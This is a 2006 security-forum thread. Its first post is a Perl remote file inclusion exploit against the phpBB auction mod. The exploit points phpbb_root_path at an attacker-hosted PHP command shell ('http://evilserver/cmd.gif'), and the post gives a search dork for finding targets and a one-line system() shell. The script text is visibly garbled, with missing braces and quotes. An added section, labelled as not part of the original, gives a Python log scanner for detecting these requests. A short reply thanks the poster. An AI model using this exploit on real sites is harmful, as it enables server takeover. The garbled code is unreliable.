Government Security
Network Security Resources

Phpbb Auction Mod V1.3 Exploit


#1 webdevil


    Retired GSO General

  • Sergeant Major
  • 1,195 posts

Posted 04 May 2006 - 09:59 AM

#phpBB auction mod - Remote File Inclusion Vuln
# Bug discovered by VietMafia
# code copier: webDEViL w3bd3vil[at]
#code same as Fast Click <= 2.3.8 Remote File Inclusion exploit
# dork: intext:"phpbb - auction" inurl:"auction"
# usage:
# perl <target> <cmd shell location> <cmd shell variable>
# perl cmd
# cmd shell example: <?system($cmd);?>
# cmd shell variable: ($_GET[cmd]);

use LWP::UserAgent;

$Path = $ARGV[0];
$Pathtocmd = $ARGV[1];
$cmdv = $ARGV[2];

if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}


print "[shell] \$";

$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET =>$Path.'/auction/auction_common.php?phpbb_root_path='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";

$res = $xpl->request($req);
$return = $res->content;
$return =~ tr/[\n]/[]/;

if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}

elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/)
{print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"}

if($return =~ /(.*)/)

$finreturn = $1;
$finreturn=~ tr/[]/[\n]/;
print "\r\n$finreturn\n\r";

else {print "[shell] \$";}}}last;

sub head()
print "\n==========================================================================
print " phpBB auction mod - Remote File Inclusion Vuln\r\n";
print "===========================================================================
sub usage()
print " Usage: perl <target> <cmd shell location> <cmd shell variable>\r\n\n";
print " <Site> - Full path to phpBB auction ex: or \r\n";
print " <cmd shell> - Path to cmd Shell e.g http://evilserver/cmd.gif \r\n";
print " <cmd variable> - Command variable used in php shell \r\n";
print "===========================================================================
print " webDEViL w3bd3vil[at] \r\n";
print "===========================================================================
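
Added example for defenders (not part of the original post): the script above requests `/auction/auction_common.php` with `phpbb_root_path` set to a remote URL, so the same request shape can be searched for in web server access logs. The log lines, IP addresses and host names below are constructed, and the common/combined log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request field of a common/combined-format access log line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value that starts with a remote scheme is the inclusion indicator.
REMOTE_RE = re.compile(r"^\s*(?:https?|ftp)://", re.IGNORECASE)

def find_rfi_attempts(lines, script="auction_common.php", param="phpbb_root_path"):
    """Return (line_no, client_ip, value) for requests that point `param` at a remote URL."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a parsable request line
        url = urlsplit(match.group(1))
        if not url.path.lower().endswith("/" + script):
            continue
        # parse_qsl percent-decodes, so an encoded "http://" is still caught.
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key == param and REMOTE_RE.match(value):
                hits.append((line_no, line.split(" ", 1)[0], value))
    return hits

# Constructed sample log lines (documentation IP ranges, placeholder hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [04/May/2006:10:01:02 +0000] '
    '"GET /forum/viewtopic.php?t=5 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [04/May/2006:10:02:11 +0000] '
    '"GET /forum/auction/auction_common.php?phpbb_root_path='
    'http://files.example/x.gif?&cmd=id HTTP/1.1" 200 312',
    '198.51.100.7 - - [04/May/2006:10:02:40 +0000] '
    '"GET /forum/auction/auction_common.php?phpbb_root_path='
    '%68ttp%3A%2F%2Ffiles.example%2Fx.gif%3F HTTP/1.0" 200 298',
    '192.0.2.10 - - [04/May/2006:10:03:05 +0000] '
    '"GET /forum/auction/auction_common.php?phpbb_root_path=./ HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for line_no, ip, value in find_rfi_attempts(SAMPLE_LOG):
        print(f"line {line_no}: {ip} set phpbb_root_path to {value!r}")
```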

#2 dingdongfromu



  • Members
  • 9 posts

Posted 04 May 2006 - 10:30 AM

Nice job, Thanks

